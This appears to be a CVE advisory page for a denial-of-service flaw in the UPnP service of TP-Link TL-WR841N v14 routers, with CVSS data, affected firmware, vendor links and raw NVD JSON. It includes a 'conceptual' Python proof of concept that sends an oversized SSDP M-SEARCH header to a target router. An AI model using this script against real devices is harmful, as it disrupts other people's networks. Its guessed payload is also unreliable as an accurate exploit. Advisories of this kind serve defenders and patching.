Security Vulnerability Report
CVE-2026-3622 CVSS 7.5 HIGH

CVE-2026-3622

Published: 2026-03-26 21:17:10
Last Modified: 2026-03-31 19:09:04
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

The vulnerability exists in the UPnP component of TL-WR841N v14, where improper input validation leads to an out-of-bounds read, potentially causing a crash of the UPnP service. Successful exploitation can cause the UPnP service to crash, resulting in a Denial-of-Service condition. This vulnerability affects TL-WR841N v14 < EN_0.9.1 4.19 Build 260303 Rel.42399n (V14_260303) and < US_0.9.1.4.19 Build 260312 Rel. 49108n (V14_0304).

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:tl-wr841n_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:tl-wr841n:14:*:*:*:*:*:*:* - NOT VULNERABLE
TL-WR841N v14 < EN_0.9.1 4.19 Build 260303 Rel.42399n (V14_260303)
TL-WR841N v14 < US_0.9.1.4.19 Build 260312 Rel. 49108n (V14_0304)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Conceptual Proof of Concept (PoC) for CVE-2026-3622
# This script sends a malformed packet to the UPnP service to trigger the crash.

target_ip = "192.168.0.1"  # Replace with the target router IP
target_port = 1900  # UPnP standard port, actual vulnerable port may vary

# Crafting a payload with improper input validation to trigger out-of-bounds read
# The exact payload structure is derived from vulnerability analysis
payload = b"M-SEARCH * HTTP/1.1\r\n" \
          b"HOST: 239.255.255.250:1900\r\n" \
          b"MAN: \"ssdp:discover\"\r\n" \
          b"MX: 2\r\n" \
          b"ST: " + b"A" * 500 + b"\r\n\r\n"  # Long string to trigger potential overflow/OOB

try:
    print(f"[*] Sending exploit payload to {target_ip}...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(payload, (target_ip, target_port))
    print("[+] Payload sent successfully. Check device status.")
    sock.close()
except Exception as e:
    print(f"[-] An error occurred: {e}")

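References

https://www.tp-link.com/en/support/download/tl-wr841n/v14/#Firmware (Product)
https://www.tp-link.com/us/support/download/tl-wr841n/v14/#Firmware (Product)
https://www.tp-link.com/us/support/faq/5033/ (Vendor Advisory)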

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3622", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-26T21:17:09.697", "lastModified": "2026-03-31T19:09:04.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability exists in the UPnP component of TL-WR841N v14, where improper input validation leads to an out-of-bounds read, potentially causing a crash of the UPnP service. \n\nSuccessful exploitation can cause the UPnP service to crash, resulting in a Denial-of-Service condition. \nThis vulnerability affects TL-WR841N v14 < EN_0.9.1 4.19 Build 260303 Rel.42399n (V14_260303) and < US_0.9.1.4.19 Build 260312 Rel. 49108n (V14_0304)."}, {"lang": "es", "value": "La vulnerabilidad existe en el componente UPnP del TL-WR841N v14, donde una validación de entrada incorrecta conduce a una lectura fuera de límites, lo que podría causar una caída del servicio UPnP.\n\nUna explotación exitosa puede provocar la caída del servicio UPnP, lo que resulta en una condición de Denegación de Servicio.\nEsta vulnerabilidad afecta a TL-WR841N v14 &lt; EN_0.9.1 4.19 Build 260303 Rel.42399n (V14_260303) y &lt; US_0.9.1.4.19 Build 260312 Rel. 
49108n (V14_0304)."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", 
"availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tl-wr841n_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.1_4.19", "matchCriteriaId": "B8FFCB9A-B16E-496A-A213-2886E262CFDC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tl-wr841n:14:*:*:*:*:*:*:*", "matchCriteriaId": "D74FA034-63F6-4F9E-BC24-364B94732E29"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/tl-wr841n/v14/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/download/tl-wr841n/v14/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5033/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}